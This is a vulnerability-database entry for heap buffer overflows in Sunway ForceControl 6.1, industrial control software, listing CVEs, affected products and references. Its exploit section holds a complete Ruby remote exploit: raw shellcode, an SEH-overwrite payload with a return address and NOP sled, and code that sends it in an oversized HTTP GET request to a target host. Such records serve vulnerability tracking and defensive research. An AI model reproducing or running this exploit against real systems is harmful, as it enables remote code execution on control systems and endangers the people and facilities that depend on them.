ID
VAR-E-201008-0051
CVE
| cve_id: | CVE-2011-2960 | Trust: 1.9 |
| cve_id: | CVE-2011-0340 | Trust: 1.4 |
| cve_id: | CVE-2010-2974 | Trust: 0.3 |
| cve_id: | CVE-2011-0488 | Trust: 0.3 |
EDB ID
35864
TITLE
Sunway ForceControl 6.1 - Multiple Heap Buffer Overflow Vulnerabilities - Windows remote Exploit
Trust: 0.6
DESCRIPTION
Sunway ForceControl 6.1 - Multiple Heap Buffer Overflow Vulnerabilities. CVE-2011-2960CVE-73124 . remote exploit for Windows platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | sunway | model: | forcecontrol | scope: | eq | version: | 6.1 | Trust: 1.0 |
| vendor: | indusoft | model: | web studio issymbol.ocx internationalseparator | scope: | - | version: | - | Trust: 0.5 |
| vendor: | indusoft | model: | web studio | scope: | eq | version: | 6.1 | Trust: 0.3 |
| vendor: | advantech | model: | indusoft | scope: | eq | version: | 6.1 | Trust: 0.3 |
| vendor: | sunway | model: | pnetpower | scope: | eq | version: | 6 | Trust: 0.3 |
| vendor: | sunway | model: | forcecontrol sp3 | scope: | eq | version: | 6.1 | Trust: 0.3 |
| vendor: | sunway | model: | forcecontrol sp2 | scope: | eq | version: | 6.1 | Trust: 0.3 |
| vendor: | sunway | model: | forcecontrol sp1 | scope: | eq | version: | 6.1 | Trust: 0.3 |
| vendor: | indusoft | model: | web studio 7.0b2 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | indusoft | model: | thin client | scope: | eq | version: | 7.0 | Trust: 0.3 |
| vendor: | advantech | model: | studio sp6 build | scope: | eq | version: | 6.161.6.0 | Trust: 0.3 |
| vendor: | indusoft | model: | web studio | scope: | ne | version: | 7.0.104 | Trust: 0.3 |
| vendor: | advantech | model: | studio | scope: | ne | version: | 7.0 | Trust: 0.3 |
EXPLOIT
source: https://www.securityfocus.com/bid/48328/info
Sunway ForceControl is prone to multiple heap-based buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied data.
Attackers can exploit these issues to execute arbitrary code on the affected device. Failed exploit attempts will result in a denial-of-service condition.
def send(packet)
begin
sock = TCPSocket.new(@ip, @port)
sock.write(packet)
rescue Exception => e
return false
else
resp = sock.recv(1024)
sock.close
return true
end
end
@ip = ARGV[0]
@port = 80
# windows/exec CMD=calc.exe
shellcode = "\xb8\xd5\x45\x06\xc4\xda\xde\xd9\x74\x24\xf4\x5b\x33\xc9" +
"\xb1\x33\x31\x43\x12\x03\x43\x12\x83\x3e\xb9\xe4\x31\x3c" +
"\xaa\x60\xb9\xbc\x2b\x13\x33\x59\x1a\x01\x27\x2a\x0f\x95" +
"\x23\x7e\xbc\x5e\x61\x6a\x37\x12\xae\x9d\xf0\x99\x88\x90" +
"\x01\x2c\x15\x7e\xc1\x2e\xe9\x7c\x16\x91\xd0\x4f\x6b\xd0" +
"\x15\xad\x84\x80\xce\xba\x37\x35\x7a\xfe\x8b\x34\xac\x75" +
"\xb3\x4e\xc9\x49\x40\xe5\xd0\x99\xf9\x72\x9a\x01\x71\xdc" +
"\x3b\x30\x56\x3e\x07\x7b\xd3\xf5\xf3\x7a\x35\xc4\xfc\x4d" +
"\x79\x8b\xc2\x62\x74\xd5\x03\x44\x67\xa0\x7f\xb7\x1a\xb3" +
"\xbb\xca\xc0\x36\x5e\x6c\x82\xe1\xba\x8d\x47\x77\x48\x81" +
"\x2c\xf3\x16\x85\xb3\xd0\x2c\xb1\x38\xd7\xe2\x30\x7a\xfc" +
"\x26\x19\xd8\x9d\x7f\xc7\x8f\xa2\x60\xaf\x70\x07\xea\x5d" +
"\x64\x31\xb1\x0b\x7b\xb3\xcf\x72\x7b\xcb\xcf\xd4\x14\xfa" +
"\x44\xbb\x63\x03\x8f\xf8\x9c\x49\x92\xa8\x34\x14\x46\xe9" +
"\x58\xa7\xbc\x2d\x65\x24\x35\xcd\x92\x34\x3c\xc8\xdf\xf2" +
"\xac\xa0\x70\x97\xd2\x17\x70\xb2\xb0\xf6\xe2\x5e\x19\x9d" +
"\x82\xc5\x65"
payload = "H" * 1599
payload << "\xeb\x06\x90\x90" # Pointer to Next SE Handler
payload << [0x719737FA].pack("V*") # SEH Handler - p/p/r
payload << "\x90" * 40
payload << shellcode
payload << "\x90" * (4058 - shellcode.length)
pack = "GET /#{payload} HTTP/1.1\r\n"
pack << "Host: http://#{@ip}:#{@port}\r\n\r\n"
puts "packet sended." if send(pack)
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Boundary Condition Error
Trust: 1.2
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | java | Trust: 0.5 |
| tag: | web | Trust: 0.5 |
| tag: | overflow | Trust: 0.5 |
CREDITS
Dillon Beresford
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 35864 | Trust: 1.9 |
| db: | NVD | id: | CVE-2011-2960 | Trust: 1.9 |
| db: | BID | id: | 48328 | Trust: 1.9 |
| db: | ZDI | id: | ZDI-12-168 | Trust: 1.7 |
| db: | NVD | id: | CVE-2011-0340 | Trust: 1.4 |
| db: | ICS CERT ALERT | id: | ICS-ALERT-11-230-01 | Trust: 1.2 |
| db: | EDBNET | id: | 61039 | Trust: 0.6 |
| db: | EDBNET | id: | 57256 | Trust: 0.6 |
| db: | 0DAYTODAY | id: | 20004 | Trust: 0.6 |
| db: | EDBNET | id: | 19939 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 118932 | Trust: 0.5 |
| db: | CERT/CC | id: | VU#703189 | Trust: 0.3 |
| db: | NVD | id: | CVE-2010-2974 | Trust: 0.3 |
| db: | BID | id: | 42184 | Trust: 0.3 |
| db: | CERT/CC | id: | VU#506864 | Trust: 0.3 |
| db: | NVD | id: | CVE-2011-0488 | Trust: 0.3 |
| db: | BID | id: | 45783 | Trust: 0.3 |
| db: | ICS CERT | id: | ICSA-12-137-02 | Trust: 0.3 |
| db: | BID | id: | 47596 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2011-2960 | Trust: 1.6 |
| url: | http://www.us-cert.gov/control_systems/pdf/ics-alert-11-230-01.pdf | Trust: 1.2 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2011-0340 | Trust: 1.1 |
| url: | https://www.securityfocus.com/bid/48328/info | Trust: 1.0 |
| url: | https://www.intelligentexploit.com | Trust: 0.6 |
| url: | https://www.exploit-db.com/exploits/35864/ | Trust: 0.6 |
| url: | https://0day.today/exploits/20004 | Trust: 0.6 |
| url: | http://support.microsoft.com/kb/240797 | Trust: 0.3 |
| url: | http://www.pacwest.wonderware.com/web/news/newsdetails.aspx?newsid=203108 | Trust: 0.3 |
| url: | http://www.kb.cert.org/vuls/id/703189 | Trust: 0.3 |
| url: | http://www.kb.cert.org/vuls/id/506864 | Trust: 0.3 |
| url: | http://www.indusoft.com/mainpage.php?aricleid=17&type=certified/hardware | Trust: 0.3 |
| url: | http://www.sunwayland.com.cn/news_info_.asp?nid=3593 | Trust: 0.3 |
| url: | https://www.exploit-db.com/exploits/35864 | Trust: 0.3 |
| url: | http://www.us-cert.gov/control_systems/pdf/icsa-12-137-02.pdf | Trust: 0.3 |
| url: | http://www.advantech.com/products/advantech-studio/mod_3d1b45b0-b0af-405c-a9cc-a27b35774634.aspx | Trust: 0.3 |
| url: | http://www.indusoft.com/hotfixes/hotfixes.php | Trust: 0.3 |
| url: | http://www.indusoft.com/indusoftart.php?catid=1&name=iws/webstudio | Trust: 0.3 |
| url: | http://secunia.com/secunia_research/2011-37/ | Trust: 0.3 |
SOURCES
| db: | BID | id: | 42184 |
| db: | BID | id: | 45783 |
| db: | BID | id: | 48328 |
| db: | BID | id: | 47596 |
| db: | PACKETSTORM | id: | 118932 |
| db: | EXPLOIT-DB | id: | 35864 |
| db: | EDBNET | id: | 61039 |
| db: | EDBNET | id: | 57256 |
| db: | EDBNET | id: | 19939 |
LAST UPDATE DATE
2022-07-27T09:25:19.226000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 42184 | date: | 2011-08-19T17:10:00 |
| db: | BID | id: | 45783 | date: | 2011-08-19T17:10:00 |
| db: | BID | id: | 48328 | date: | 2011-08-26T23:10:00 |
| db: | BID | id: | 47596 | date: | 2013-04-02T15:57:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 42184 | date: | 2010-08-04T00:00:00 |
| db: | BID | id: | 45783 | date: | 2011-01-12T00:00:00 |
| db: | BID | id: | 48328 | date: | 2011-06-17T00:00:00 |
| db: | BID | id: | 47596 | date: | 2011-04-27T00:00:00 |
| db: | PACKETSTORM | id: | 118932 | date: | 2012-12-19T06:24:20 |
| db: | EXPLOIT-DB | id: | 35864 | date: | 2011-06-17T00:00:00 |
| db: | EDBNET | id: | 61039 | date: | 2012-09-18T00:00:00 |
| db: | EDBNET | id: | 57256 | date: | 2011-06-17T00:00:00 |
| db: | EDBNET | id: | 19939 | date: | 2012-12-19T00:00:00 |